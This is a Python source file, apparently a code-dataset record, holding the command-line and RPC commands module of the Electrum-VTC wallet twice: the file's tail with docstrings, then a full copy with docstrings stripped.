'txid': tx_hash,
'timestamp': timestamp,
'date': date,
'input_addresses': input_addresses,
'output_addresses': output_addresses,
'label': label,
'value': float(value)/COIN if value is not None else None,
'height': height,
'confirmations': conf
})
return out
@command('w')
def setlabel(self, key, label):
"""Assign a label to an item. Item may be a Vertcoin address or a
transaction ID"""
self.wallet.set_label(key, label)
@command('w')
def listcontacts(self):
"""Show your list of contacts"""
return self.wallet.contacts
@command('w')
def getalias(self, key):
"""Retrieve alias. Lookup in your list of contacts, and for an OpenAlias DNS record."""
return self.wallet.contacts.resolve(key)
@command('w')
def searchcontacts(self, query):
"""Search through contacts, return matching entries. """
results = {}
for key, value in self.wallet.contacts.items():
if query.lower() in key.lower():
results[key] = value
return results
@command('w')
def listaddresses(self, receiving=False, change=False, show_labels=False, frozen=False, unused=False, funded=False, show_balance=False):
"""List wallet addresses. Returns the list of all addresses in your wallet. Use optional arguments to filter the results."""
out = []
for addr in self.wallet.get_addresses():
if frozen and not self.wallet.is_frozen(addr):
continue
if receiving and self.wallet.is_change(addr):
continue
if change and not self.wallet.is_change(addr):
continue
if unused and self.wallet.is_used(addr):
continue
if funded and self.wallet.is_empty(addr):
continue
item = addr
if show_balance:
item += ", "+ format_satoshis(sum(self.wallet.get_addr_balance(addr)))
if show_labels:
item += ', ' + repr(self.wallet.labels.get(addr, ''))
out.append(item)
return out
@command('n')
def gettransaction(self, txid):
"""Retrieve a transaction. """
if self.wallet and txid in self.wallet.transactions:
tx = self.wallet.transactions[txid]
else:
raw = self.network.synchronous_get(('blockchain.transaction.get', [txid]))
if raw:
tx = Transaction(raw)
else:
raise BaseException("Unknown transaction")
return tx.as_dict()
@command('')
def encrypt(self, pubkey, message):
"""Encrypt a message with a public key. Use quotes if the message contains whitespaces."""
return bitcoin.encrypt_message(message, pubkey)
@command('wp')
def decrypt(self, pubkey, encrypted, password=None):
"""Decrypt a message encrypted with a public key."""
return self.wallet.decrypt_message(pubkey, encrypted, password)
def _format_request(self, out):
pr_str = {
PR_UNKNOWN: 'Unknown',
PR_UNPAID: 'Pending',
PR_PAID: 'Paid',
PR_EXPIRED: 'Expired',
}
out['amount (LTC)'] = format_satoshis(out.get('amount'))
out['status'] = pr_str[out.get('status', PR_UNKNOWN)]
return out
@command('w')
def getrequest(self, key):
"""Return a payment request"""
r = self.wallet.get_payment_request(key, self.config)
if not r:
raise BaseException("Request not found")
return self._format_request(r)
#@command('w')
#def ackrequest(self, serialized):
# """<Not implemented>"""
# pass
@command('w')
def listrequests(self, pending=False, expired=False, paid=False):
"""List the payment requests you made."""
out = self.wallet.get_sorted_requests(self.config)
if pending:
f = PR_UNPAID
elif expired:
f = PR_EXPIRED
elif paid:
f = PR_PAID
else:
f = None
if f is not None:
out = filter(lambda x: x.get('status')==f, out)
return map(self._format_request, out)
@command('w')
def getunusedaddress(self,force=False):
"""Returns the first unused address."""
addr = self.wallet.get_unused_address()
if addr is None and force:
addr = self.wallet.create_new_address(False)
if addr:
return addr
else:
return False
@command('w')
def addrequest(self, amount, memo='', expiration=None, force=False):
"""Create a payment request."""
addr = self.wallet.get_unused_address()
if addr is None:
if force:
addr = self.wallet.create_new_address(False)
else:
return False
amount = satoshis(amount)
expiration = int(expiration) if expiration else None
req = self.wallet.make_payment_request(addr, amount, memo, expiration)
self.wallet.add_payment_request(req, self.config)
out = self.wallet.get_payment_request(addr, self.config)
return self._format_request(out)
@command('wp')
def signrequest(self, address, password=None):
"Sign payment request with an OpenAlias"
alias = self.config.get('alias')
if not alias:
raise BaseException('No alias in your configuration')
alias_addr = self.wallet.contacts.resolve(alias)['address']
self.wallet.sign_payment_request(address, alias, alias_addr, password)
@command('w')
def rmrequest(self, address):
"""Remove a payment request"""
return self.wallet.remove_payment_request(address, self.config)
@command('w')
def clearrequests(self):
"""Remove all payment requests"""
for k in self.wallet.receive_requests.keys():
self.wallet.remove_payment_request(k, self.config)
@command('n')
def notify(self, address, URL):
"""Watch an address. Everytime the address changes, a http POST is sent to the URL."""
def callback(x):
import urllib2
headers = {'content-type':'application/json'}
data = {'address':address, 'status':x.get('result')}
try:
req = urllib2.Request(URL, json.dumps(data), headers)
response_stream = urllib2.urlopen(req, timeout=5)
util.print_error('Got Response for %s' % address)
except BaseException as e:
util.print_error(str(e))
self.network.send([('blockchain.address.subscribe', [address])], callback)
return True
@command('wn')
def is_synchronized(self):
""" return wallet synchronization status """
return self.wallet.is_up_to_date()
@command('')
def help(self):
# for the python console
return sorted(known_commands.keys())
param_descriptions = {
'privkey': 'Private key. Type \'?\' to get a prompt.',
'destination': 'Vertcoin address, contact or alias',
'address': 'Vertcoin address',
'seed': 'Seed phrase',
'txid': 'Transaction ID',
'pos': 'Position',
'height': 'Block height',
'tx': 'Serialized transaction (hexadecimal)',
'key': 'Variable name',
'pubkey': 'Public key',
'message': 'Clear text message. Use quotes if it contains spaces.',
'encrypted': 'Encrypted message',
'amount': 'Amount to be sent (in VTC). Type \'!\' to send the maximum available.',
'requested_amount': 'Requested amount (in VTC).',
'outputs': 'list of ["address", amount]',
}
command_options = {
'password': ("-W", "--password", "Password"),
'new_password':(None, "--new_password","New Password"),
'receiving': (None, "--receiving", "Show only receiving addresses"),
'change': (None, "--change", "Show only change addresses"),
'frozen': (None, "--frozen", "Show only frozen addresses"),
'unused': (None, "--unused", "Show only unused addresses"),
'funded': (None, "--funded", "Show only funded addresses"),
'show_balance':("-b", "--balance", "Show the balances of listed addresses"),
'show_labels': ("-l", "--labels", "Show the labels of listed addresses"),
'nocheck': (None, "--nocheck", "Do not verify aliases"),
'imax': (None, "--imax", "Maximum number of inputs"),
'tx_fee': ("-f", "--fee", "Transaction fee (in LTC)"),
'from_addr': ("-F", "--from", "Source address. If it isn't in the wallet, it will ask for the private key unless supplied in the format public_key:private_key. It's not saved in the wallet."),
'change_addr': ("-c", "--change", "Change address. Default is a spare address, or the source address if it's not in the wallet"),
'nbits': (None, "--nbits", "Number of bits of entropy"),
'entropy': (None, "--entropy", "Custom entropy"),
'language': ("-L", "--lang", "Default language for wordlist"),
'gap_limit': ("-G", "--gap", "Gap limit"),
'privkey': (None, "--privkey", "Private key. Set to '?' to get a prompt."),
'unsigned': ("-u", "--unsigned", "Do not sign transaction"),
'rbf': (None, "--rbf", "Replace-by-fee transaction"),
'locktime': (None, "--locktime", "Set locktime block number"),
'domain': ("-D", "--domain", "List of addresses"),
'memo': ("-m", "--memo", "Description of the request"),
'expiration': (None, "--expiration", "Time in seconds"),
'timeout': (None, "--timeout", "Timeout in seconds"),
'force': (None, "--force", "Create new address beyond gap limit, if no more addresses are available."),
'pending': (None, "--pending", "Show only pending requests."),
'expired': (None, "--expired", "Show only expired requests."),
'paid': (None, "--paid", "Show only paid requests."),
}
# don't use floats because of rounding errors
from transaction import tx_from_str
json_loads = lambda x: json.loads(x, parse_float=lambda x: str(Decimal(x)))
arg_types = {
'num': int,
'nbits': int,
'imax': int,
'entropy': long,
'tx': tx_from_str,
'pubkeys': json_loads,
'jsontx': json_loads,
'inputs': json_loads,
'outputs': json_loads,
'tx_fee': lambda x: str(Decimal(x)) if x is not None else None,
'amount': lambda x: str(Decimal(x)) if x != '!' else '!',
'locktime': int,
}
config_variables = {
'addrequest': {
'requests_dir': 'directory where a bip70 file will be written.',
'ssl_privkey': 'Path to your SSL private key, needed to sign the request.',
'ssl_chain': 'Chain of SSL certificates, needed for signed requests. Put your certificate at the top and the root CA at the end',
'url_rewrite': 'Parameters passed to str.replace(), in order to create the r= part of vertcoin: URIs. Example: \"(\'file:///var/www/\',\'https://electrum-ltc.org/\')\"',
},
'listrequests':{
'url_rewrite': 'Parameters passed to str.replace(), in order to create the r= part of vertcoin: URIs. Example: \"(\'file:///var/www/\',\'https://electrum-ltc.org/\')\"',
}
}
def set_default_subparser(self, name, args=None):
"""see http://stackoverflow.com/questions/5176691/argparse-how-to-specify-a-default-subcommand"""
subparser_found = False
for arg in sys.argv[1:]:
if arg in ['-h', '--help']: # global help if no subparser
break
else:
for x in self._subparsers._actions:
if not isinstance(x, argparse._SubParsersAction):
continue
for sp_name in x._name_parser_map.keys():
if sp_name in sys.argv[1:]:
subparser_found = True
if not subparser_found:
# insert default in first position, this implies no
# global options without a sub_parsers specified
if args is None:
sys.argv.insert(1, name)
else:
args.insert(0, name)
argparse.ArgumentParser.set_default_subparser = set_default_subparser
# workaround https://bugs.python.org/issue23058
# see https://github.com/nickstenning/honcho/pull/121
def subparser_call(self, parser, namespace, values, option_string=None):
from argparse import ArgumentError, SUPPRESS, _UNRECOGNIZED_ARGS_ATTR
parser_name = values[0]
arg_strings = values[1:]
# set the parser name if requested
if self.dest is not SUPPRESS:
setattr(namespace, self.dest, parser_name)
# select the parser
try:
parser = self._name_parser_map[parser_name]
except KeyError:
tup = parser_name, ', '.join(self._name_parser_map)
msg = _('unknown parser %r (choices: %s)') % tup
raise ArgumentError(self, msg)
# parse all the remaining options into the namespace
# store any unrecognized options on the object, so that the top
# level parser can decide what to do with them
namespace, arg_strings = parser.parse_known_args(arg_strings, namespace)
if arg_strings:
vars(namespace).setdefault(_UNRECOGNIZED_ARGS_ATTR, [])
getattr(namespace, _UNRECOGNIZED_ARGS_ATTR).extend(arg_strings)
argparse._SubParsersAction.__call__ = subparser_call
def add_network_options(parser):
parser.add_argument("-1", "--oneserver", action="store_true", dest="oneserver", default=False, help="connect to one server only")
parser.add_argument("-s", "--server", dest="server", default=None, help="set server host:port:protocol, where protocol is either t (tcp) or s (ssl)")
parser.add_argument("-p", "--proxy", dest="proxy", default=None, help="set proxy [type:]host[:port], where type is socks4,socks5 or http")
def add_global_options(parser):
group = parser.add_argument_group('global options')
group.add_argument("-v", "--verbose", action="store_true", dest="verbose", default=False, help="Show debugging information")
group.add_argument("-D", "--dir", dest="electrum_path", help="electrum directory")
group.add_argument("-P", "--portable", action="store_true", dest="portable", default=False, help="Use local 'electrum-vtc_data' directory")
group.add_argument("-w", "--wallet", dest="wallet_path", help="wallet path")
group.add_argument("--testnet", action="store_true", dest="testnet", default=False, help="Use Testnet")
group.add_argument("--segwit", action="store_true", dest="segwit", default=False, help="The Wizard will create Segwit seed phrases (Testnet only).")
group.add_argument("--nolnet", action="store_true", dest="nolnet", default=False, help="Use Nolnet")
def get_parser():
# create main parser
parser = argparse.ArgumentParser(
epilog="Run 'electrum-vtc help <command>' to see the help for a command")
add_global_options(parser)
subparsers = parser.add_subparsers(dest='cmd', metavar='<command>')
# gui
parser_gui = subparsers.add_parser('gui', description="Run Electrum's Graphical User Interface.", help="Run GUI (default)")
parser_gui.add_argument("url", nargs='?', default=None, help="vertcoin URI (or bip70 file)")
parser_gui.add_argument("-g", "--gui", dest="gui", help="select graphical user interface", choices=['qt', 'kivy', 'text', 'stdio', 'vtc'])
parser_gui.add_argument("-o", "--offline", action="store_true", dest="offline", default=False, help="Run offline")
parser_gui.add_argument("-m", action="store_true", dest="hide_gui", default=False, help="hide GUI on startup")
parser_gui.add_argument("-L", "--lang", dest="language", default=None, help="default language used in GUI")
add_network_options(parser_gui)
add_global_options(parser_gui)
# daemon
parser_daemon = subparsers.add_parser('daemon', help="Run Daemon")
parser_daemon.add_argument("subcommand", choices=['start', 'status', 'stop', 'load_wallet', 'close_wallet'], nargs='?')
#parser_daemon.set_defaults(func=run_daemon)
add_network_options(parser_daemon)
add_global_options(parser_daemon)
# commands
for cmdname in sorted(known_commands.keys()):
cmd = known_commands[cmdname]
p = subparsers.add_parser(cmdname, help=cmd.help, description=cmd.description)
add_global_options(p)
if cmdname == 'restore':
p.add_argument("-o", "--offline", action="store_true", dest="offline", default=False, help="Run offline")
for optname, default in zip(cmd.options, cmd.defaults):
a, b, help = command_options[optname]
action = "store_true" if type(default) is bool else 'store'
args = (a, b) if a else (b,)
if action == 'store':
_type = arg_types.get(optname, str)
p.add_argument(*args, dest=optname, action=action, default=default, help=help, type=_type)
else:
p.add_argument(*args, dest=optname, action=action, default=default, help=help)
for param in cmd.params:
h = param_descriptions.get(param, '')
_type = arg_types.get(param, str)
p.add_argument(param, help=h, type=_type)
cvh = config_variables.get(cmdname)
if cvh:
group = p.add_argument_group('configuration variables', '(set with setconfig/getconfig)')
for k, v in cvh.items():
group.add_argument(k, nargs='?', help=v)
# 'gui' is the default command
parser.set_default_subparser('gui')
return parser
| 40.859091
| 205
| 0.618033
|
import os
import sys
import datetime
import time
import copy
import argparse
import json
import ast
import base64
from functools import wraps
from decimal import Decimal
import util
from util import print_msg, format_satoshis, print_stderr
import bitcoin
from bitcoin import is_address, hash_160, COIN, TYPE_ADDRESS
import transaction
from transaction import Transaction
import paymentrequest
from paymentrequest import PR_PAID, PR_UNPAID, PR_UNKNOWN, PR_EXPIRED
import contacts
known_commands = {}
def satoshis(amount):
return int(COIN*Decimal(amount)) if amount not in ['!', None] else amount
class Command:
def __init__(self, func, s):
self.name = func.__name__
self.requires_network = 'n' in s
self.requires_wallet = 'w' in s
self.requires_password = 'p' in s
self.description = func.__doc__
self.help = self.description.split('.')[0] if self.description else None
varnames = func.func_code.co_varnames[1:func.func_code.co_argcount]
self.defaults = func.func_defaults
if self.defaults:
n = len(self.defaults)
self.params = list(varnames[:-n])
self.options = list(varnames[-n:])
else:
self.params = list(varnames)
self.options = []
self.defaults = []
def command(s):
def decorator(func):
global known_commands
name = func.__name__
known_commands[name] = Command(func, s)
@wraps(func)
def func_wrapper(*args, **kwargs):
c = known_commands[func.__name__]
if c.requires_wallet and args[0].wallet is None:
raise BaseException("wallet not loaded. Use 'electrum-ltc daemon load_wallet'")
return func(*args, **kwargs)
return func_wrapper
return decorator
class Commands:
def __init__(self, config, wallet, network, callback = None):
self.config = config
self.wallet = wallet
self.network = network
self._callback = callback
def _run(self, method, args, password_getter):
cmd = known_commands[method]
if cmd.requires_password and self.wallet.has_password():
password = password_getter()
if password is None:
return
else:
password = None
f = getattr(self, method)
if cmd.requires_password:
result = f(*args, **{'password':password})
else:
result = f(*args)
if self._callback:
self._callback()
return result
@command('')
def commands(self):
return ' '.join(sorted(known_commands.keys()))
@command('')
def create(self):
raise BaseException('Not a JSON-RPC command')
@command('wn')
def restore(self, text):
raise BaseException('Not a JSON-RPC command')
@command('wp')
def password(self, password=None, new_password=None):
self.wallet.update_password(password, new_password)
self.wallet.storage.write()
return {'password':self.wallet.has_password()}
@command('')
def getconfig(self, key):
return self.config.get(key)
@command('')
def setconfig(self, key, value):
try:
value = ast.literal_eval(value)
except:
pass
self.config.set_key(key, value)
return True
@command('')
def make_seed(self, nbits=132, entropy=1, language=None):
from mnemonic import Mnemonic
s = Mnemonic(language).make_seed('standard', nbits, custom_entropy=entropy)
return s.encode('utf8')
@command('')
def check_seed(self, seed, entropy=1, language=None):
from mnemonic import Mnemonic
return Mnemonic(language).check_seed(seed, entropy)
@command('n')
def getaddresshistory(self, address):
return self.network.synchronous_get(('blockchain.address.get_history', [address]))
@command('w')
def listunspent(self):
l = copy.deepcopy(self.wallet.get_utxos(exclude_frozen=False))
for i in l:
v = i["value"]
i["value"] = float(v)/COIN if v is not None else None
return l
@command('n')
def getaddressunspent(self, address):
return self.network.synchronous_get(('blockchain.address.listunspent', [address]))
@command('n')
def getutxoaddress(self, txid, pos):
r = self.network.synchronous_get(('blockchain.utxo.get_address', [txid, pos]))
return {'address': r}
@command('')
def serialize(self, jsontx):
keypairs = {}
inputs = jsontx.get('inputs')
outputs = jsontx.get('outputs')
locktime = jsontx.get('locktime', 0)
for txin in inputs:
if txin.get('output'):
prevout_hash, prevout_n = txin['output'].split(':')
txin['prevout_n'] = int(prevout_n)
txin['prevout_hash'] = prevout_hash
if txin.get('redeemPubkey'):
pubkey = txin['redeemPubkey']
txin['type'] = 'p2pkh'
txin['x_pubkeys'] = [pubkey]
txin['signatures'] = [None]
txin['num_sig'] = 1
if txin.get('privkey'):
keypairs[pubkey] = txin['privkey']
elif txin.get('redeemScript'):
raise BaseException('Not implemented')
outputs = map(lambda x: (TYPE_ADDRESS, x['address'], int(x['value'])), outputs)
tx = Transaction.from_io(inputs, outputs, locktime=locktime)
tx.sign(keypairs)
return tx.as_dict()
@command('wp')
def signtransaction(self, tx, privkey=None, password=None):
tx = Transaction(tx)
if privkey:
pubkey = bitcoin.public_key_from_private_key(privkey)
h160 = bitcoin.hash_160(pubkey.decode('hex'))
x_pubkey = 'fd' + (chr(0) + h160).encode('hex')
tx.sign({x_pubkey:privkey})
else:
self.wallet.sign_transaction(tx, password)
return tx.as_dict()
@command('')
def deserialize(self, tx):
tx = Transaction(tx)
return tx.deserialize()
@command('n')
def broadcast(self, tx, timeout=30):
tx = Transaction(tx)
return self.network.broadcast(tx, timeout)
@command('')
def createmultisig(self, num, pubkeys):
assert isinstance(pubkeys, list), (type(num), type(pubkeys))
redeem_script = transaction.multisig_script(pubkeys, num)
address = bitcoin.hash160_to_p2sh(hash_160(redeem_script.decode('hex')))
return {'address':address, 'redeemScript':redeem_script}
@command('w')
def freeze(self, address):
return self.wallet.set_frozen_state([address], True)
@command('w')
def unfreeze(self, address):
return self.wallet.set_frozen_state([address], False)
@command('wp')
def getprivatekeys(self, address, password=None):
if is_address(address):
return self.wallet.get_private_key(address, password)
domain = address
return [self.wallet.get_private_key(address, password) for address in domain]
@command('w')
def ismine(self, address):
return self.wallet.is_mine(address)
@command('')
def dumpprivkeys(self):
return "This command is deprecated. Use a pipe instead: 'electrum-vtc listaddresses | electrum-vtc getprivatekeys - '"
@command('')
def validateaddress(self, address):
return is_address(address)
@command('w')
def getpubkeys(self, address):
return self.wallet.get_public_keys(address)
@command('w')
def getbalance(self):
c, u, x = self.wallet.get_balance()
out = {"confirmed": str(Decimal(c)/COIN)}
if u:
out["unconfirmed"] = str(Decimal(u)/COIN)
if x:
out["unmatured"] = str(Decimal(x)/COIN)
return out
@command('n')
def getaddressbalance(self, address):
out = self.network.synchronous_get(('blockchain.address.get_balance', [address]))
out["confirmed"] = str(Decimal(out["confirmed"])/COIN)
out["unconfirmed"] = str(Decimal(out["unconfirmed"])/COIN)
return out
@command('n')
def getproof(self, address):
p = self.network.synchronous_get(('blockchain.address.get_proof', [address]))
out = []
for i,s in p:
out.append(i)
return out
@command('n')
def getmerkle(self, txid, height):
return self.network.synchronous_get(('blockchain.transaction.get_merkle', [txid, int(height)]))
@command('n')
def getservers(self):
return self.network.get_servers()
@command('')
def version(self):
from version import ELECTRUM_VERSION
return ELECTRUM_VERSION
@command('w')
def getmpk(self):
return self.wallet.get_master_public_key()
@command('wp')
def getmasterprivate(self, password=None):
return str(self.wallet.keystore.get_master_private_key(password))
@command('wp')
def getseed(self, password=None):
s = self.wallet.get_seed(password)
return s.encode('utf8')
@command('wp')
def importprivkey(self, privkey, password=None):
if not self.wallet.can_import_privkey():
return "Error: This type of wallet cannot import private keys. Try to create a new wallet with that key."
try:
addr = self.wallet.import_key(privkey, password)
out = "Keypair imported: " + addr
except BaseException as e:
out = "Error: " + str(e)
return out
def _resolver(self, x):
if x is None:
return None
out = self.wallet.contacts.resolve(x)
if out.get('type') == 'openalias' and self.nocheck is False and out.get('validated') is False:
raise BaseException('cannot verify alias', x)
return out['address']
@command('nw')
def sweep(self, privkey, destination, tx_fee=None, nocheck=False, imax=100):
tx_fee = satoshis(tx_fee)
privkeys = privkey if type(privkey) is list else [privkey]
self.nocheck = nocheck
dest = self._resolver(destination)
tx = self.wallet.sweep(privkeys, self.network, self.config, dest, tx_fee, imax)
return tx.as_dict() if tx else None
@command('wp')
def signmessage(self, address, message, password=None):
sig = self.wallet.sign_message(address, message, password)
return base64.b64encode(sig)
@command('')
def verifymessage(self, address, signature, message):
sig = base64.b64decode(signature)
return bitcoin.verify_message(address, sig, message)
def _mktx(self, outputs, fee, change_addr, domain, nocheck, unsigned, rbf, password, locktime=None):
self.nocheck = nocheck
change_addr = self._resolver(change_addr)
domain = None if domain is None else map(self._resolver, domain)
final_outputs = []
for address, amount in outputs:
address = self._resolver(address)
amount = satoshis(amount)
final_outputs.append((TYPE_ADDRESS, address, amount))
coins = self.wallet.get_spendable_coins(domain, self.config)
tx = self.wallet.make_unsigned_transaction(coins, final_outputs, self.config, fee, change_addr)
if locktime != None:
tx.locktime = locktime
if rbf:
tx.set_rbf(True)
if not unsigned:
self.wallet.sign_transaction(tx, password)
return tx
@command('wp')
def payto(self, destination, amount, tx_fee=None, from_addr=None, change_addr=None, nocheck=False, unsigned=False, rbf=False, password=None, locktime=None):
tx_fee = satoshis(tx_fee)
domain = [from_addr] if from_addr else None
tx = self._mktx([(destination, amount)], tx_fee, change_addr, domain, nocheck, unsigned, rbf, password, locktime)
return tx.as_dict()
@command('wp')
def paytomany(self, outputs, tx_fee=None, from_addr=None, change_addr=None, nocheck=False, unsigned=False, rbf=False, password=None, locktime=None):
tx_fee = satoshis(tx_fee)
domain = [from_addr] if from_addr else None
tx = self._mktx(outputs, tx_fee, change_addr, domain, nocheck, unsigned, rbf, password, locktime)
return tx.as_dict()
@command('w')
def history(self):
balance = 0
out = []
for item in self.wallet.get_history():
tx_hash, height, conf, timestamp, value, balance = item
if timestamp:
date = datetime.datetime.fromtimestamp(timestamp).isoformat(' ')[:-3]
else:
date = "----"
label = self.wallet.get_label(tx_hash)
tx = self.wallet.transactions.get(tx_hash)
tx.deserialize()
input_addresses = []
output_addresses = []
for x in tx.inputs():
if x['type'] == 'coinbase': continue
addr = x.get('address')
if addr == None: continue
if addr == "(pubkey)":
prevout_hash = x.get('prevout_hash')
prevout_n = x.get('prevout_n')
_addr = self.wallet.find_pay_to_pubkey_address(prevout_hash, prevout_n)
if _addr:
addr = _addr
input_addresses.append(addr)
for addr, v in tx.get_outputs():
output_addresses.append(addr)
out.append({
'txid': tx_hash,
'timestamp': timestamp,
'date': date,
'input_addresses': input_addresses,
'output_addresses': output_addresses,
'label': label,
'value': float(value)/COIN if value is not None else None,
'height': height,
'confirmations': conf
})
return out
@command('w')
def setlabel(self, key, label):
self.wallet.set_label(key, label)
@command('w')
def listcontacts(self):
return self.wallet.contacts
@command('w')
def getalias(self, key):
return self.wallet.contacts.resolve(key)
@command('w')
def searchcontacts(self, query):
results = {}
for key, value in self.wallet.contacts.items():
if query.lower() in key.lower():
results[key] = value
return results
@command('w')
def listaddresses(self, receiving=False, change=False, show_labels=False, frozen=False, unused=False, funded=False, show_balance=False):
out = []
for addr in self.wallet.get_addresses():
if frozen and not self.wallet.is_frozen(addr):
continue
if receiving and self.wallet.is_change(addr):
continue
if change and not self.wallet.is_change(addr):
continue
if unused and self.wallet.is_used(addr):
continue
if funded and self.wallet.is_empty(addr):
continue
item = addr
if show_balance:
item += ", "+ format_satoshis(sum(self.wallet.get_addr_balance(addr)))
if show_labels:
item += ', ' + repr(self.wallet.labels.get(addr, ''))
out.append(item)
return out
@command('n')
def gettransaction(self, txid):
if self.wallet and txid in self.wallet.transactions:
tx = self.wallet.transactions[txid]
else:
raw = self.network.synchronous_get(('blockchain.transaction.get', [txid]))
if raw:
tx = Transaction(raw)
else:
raise BaseException("Unknown transaction")
return tx.as_dict()
@command('')
def encrypt(self, pubkey, message):
return bitcoin.encrypt_message(message, pubkey)
@command('wp')
def decrypt(self, pubkey, encrypted, password=None):
return self.wallet.decrypt_message(pubkey, encrypted, password)
def _format_request(self, out):
pr_str = {
PR_UNKNOWN: 'Unknown',
PR_UNPAID: 'Pending',
PR_PAID: 'Paid',
PR_EXPIRED: 'Expired',
}
out['amount (LTC)'] = format_satoshis(out.get('amount'))
out['status'] = pr_str[out.get('status', PR_UNKNOWN)]
return out
@command('w')
def getrequest(self, key):
r = self.wallet.get_payment_request(key, self.config)
if not r:
raise BaseException("Request not found")
return self._format_request(r)
@command('w')
def listrequests(self, pending=False, expired=False, paid=False):
out = self.wallet.get_sorted_requests(self.config)
if pending:
f = PR_UNPAID
elif expired:
f = PR_EXPIRED
elif paid:
f = PR_PAID
else:
f = None
if f is not None:
out = filter(lambda x: x.get('status')==f, out)
return map(self._format_request, out)
@command('w')
def getunusedaddress(self,force=False):
addr = self.wallet.get_unused_address()
if addr is None and force:
addr = self.wallet.create_new_address(False)
if addr:
return addr
else:
return False
@command('w')
def addrequest(self, amount, memo='', expiration=None, force=False):
addr = self.wallet.get_unused_address()
if addr is None:
if force:
addr = self.wallet.create_new_address(False)
else:
return False
amount = satoshis(amount)
expiration = int(expiration) if expiration else None
req = self.wallet.make_payment_request(addr, amount, memo, expiration)
self.wallet.add_payment_request(req, self.config)
out = self.wallet.get_payment_request(addr, self.config)
return self._format_request(out)
@command('wp')
def signrequest(self, address, password=None):
alias = self.config.get('alias')
if not alias:
raise BaseException('No alias in your configuration')
alias_addr = self.wallet.contacts.resolve(alias)['address']
self.wallet.sign_payment_request(address, alias, alias_addr, password)
@command('w')
def rmrequest(self, address):
return self.wallet.remove_payment_request(address, self.config)
@command('w')
def clearrequests(self):
for k in self.wallet.receive_requests.keys():
self.wallet.remove_payment_request(k, self.config)
@command('n')
def notify(self, address, URL):
def callback(x):
import urllib2
headers = {'content-type':'application/json'}
data = {'address':address, 'status':x.get('result')}
try:
req = urllib2.Request(URL, json.dumps(data), headers)
response_stream = urllib2.urlopen(req, timeout=5)
util.print_error('Got Response for %s' % address)
except BaseException as e:
util.print_error(str(e))
self.network.send([('blockchain.address.subscribe', [address])], callback)
return True
@command('wn')
def is_synchronized(self):
return self.wallet.is_up_to_date()
@command('')
def help(self):
return sorted(known_commands.keys())
param_descriptions = {
'privkey': 'Private key. Type \'?\' to get a prompt.',
'destination': 'Vertcoin address, contact or alias',
'address': 'Vertcoin address',
'seed': 'Seed phrase',
'txid': 'Transaction ID',
'pos': 'Position',
'height': 'Block height',
'tx': 'Serialized transaction (hexadecimal)',
'key': 'Variable name',
'pubkey': 'Public key',
'message': 'Clear text message. Use quotes if it contains spaces.',
'encrypted': 'Encrypted message',
'amount': 'Amount to be sent (in VTC). Type \'!\' to send the maximum available.',
'requested_amount': 'Requested amount (in VTC).',
'outputs': 'list of ["address", amount]',
}
command_options = {
'password': ("-W", "--password", "Password"),
'new_password':(None, "--new_password","New Password"),
'receiving': (None, "--receiving", "Show only receiving addresses"),
'change': (None, "--change", "Show only change addresses"),
'frozen': (None, "--frozen", "Show only frozen addresses"),
'unused': (None, "--unused", "Show only unused addresses"),
'funded': (None, "--funded", "Show only funded addresses"),
'show_balance':("-b", "--balance", "Show the balances of listed addresses"),
'show_labels': ("-l", "--labels", "Show the labels of listed addresses"),
'nocheck': (None, "--nocheck", "Do not verify aliases"),
'imax': (None, "--imax", "Maximum number of inputs"),
'tx_fee': ("-f", "--fee", "Transaction fee (in LTC)"),
'from_addr': ("-F", "--from", "Source address. If it isn't in the wallet, it will ask for the private key unless supplied in the format public_key:private_key. It's not saved in the wallet."),
'change_addr': ("-c", "--change", "Change address. Default is a spare address, or the source address if it's not in the wallet"),
'nbits': (None, "--nbits", "Number of bits of entropy"),
'entropy': (None, "--entropy", "Custom entropy"),
'language': ("-L", "--lang", "Default language for wordlist"),
'gap_limit': ("-G", "--gap", "Gap limit"),
'privkey': (None, "--privkey", "Private key. Set to '?' to get a prompt."),
'unsigned': ("-u", "--unsigned", "Do not sign transaction"),
'rbf': (None, "--rbf", "Replace-by-fee transaction"),
'locktime': (None, "--locktime", "Set locktime block number"),
'domain': ("-D", "--domain", "List of addresses"),
'memo': ("-m", "--memo", "Description of the request"),
'expiration': (None, "--expiration", "Time in seconds"),
'timeout': (None, "--timeout", "Timeout in seconds"),
'force': (None, "--force", "Create new address beyond gap limit, if no more addresses are available."),
'pending': (None, "--pending", "Show only pending requests."),
'expired': (None, "--expired", "Show only expired requests."),
'paid': (None, "--paid", "Show only paid requests."),
}
# don't use floats because of rounding errors
from transaction import tx_from_str
json_loads = lambda x: json.loads(x, parse_float=lambda x: str(Decimal(x)))
arg_types = {
'num': int,
'nbits': int,
'imax': int,
'entropy': long,
'tx': tx_from_str,
'pubkeys': json_loads,
'jsontx': json_loads,
'inputs': json_loads,
'outputs': json_loads,
'tx_fee': lambda x: str(Decimal(x)) if x is not None else None,
'amount': lambda x: str(Decimal(x)) if x != '!' else '!',
'locktime': int,
}
config_variables = {
'addrequest': {
'requests_dir': 'directory where a bip70 file will be written.',
'ssl_privkey': 'Path to your SSL private key, needed to sign the request.',
'ssl_chain': 'Chain of SSL certificates, needed for signed requests. Put your certificate at the top and the root CA at the end',
'url_rewrite': 'Parameters passed to str.replace(), in order to create the r= part of vertcoin: URIs. Example: \"(\'file:///var/www/\',\'https://electrum-ltc.org/\')\"',
},
'listrequests':{
'url_rewrite': 'Parameters passed to str.replace(), in order to create the r= part of vertcoin: URIs. Example: \"(\'file:///var/www/\',\'https://electrum-ltc.org/\')\"',
}
}
def set_default_subparser(self, name, args=None):
subparser_found = False
for arg in sys.argv[1:]:
if arg in ['-h', '--help']: break
else:
for x in self._subparsers._actions:
if not isinstance(x, argparse._SubParsersAction):
continue
for sp_name in x._name_parser_map.keys():
if sp_name in sys.argv[1:]:
subparser_found = True
if not subparser_found:
if args is None:
sys.argv.insert(1, name)
else:
args.insert(0, name)
argparse.ArgumentParser.set_default_subparser = set_default_subparser
def subparser_call(self, parser, namespace, values, option_string=None):
from argparse import ArgumentError, SUPPRESS, _UNRECOGNIZED_ARGS_ATTR
parser_name = values[0]
arg_strings = values[1:]
if self.dest is not SUPPRESS:
setattr(namespace, self.dest, parser_name)
try:
parser = self._name_parser_map[parser_name]
except KeyError:
tup = parser_name, ', '.join(self._name_parser_map)
msg = _('unknown parser %r (choices: %s)') % tup
raise ArgumentError(self, msg)
namespace, arg_strings = parser.parse_known_args(arg_strings, namespace)
if arg_strings:
vars(namespace).setdefault(_UNRECOGNIZED_ARGS_ATTR, [])
getattr(namespace, _UNRECOGNIZED_ARGS_ATTR).extend(arg_strings)
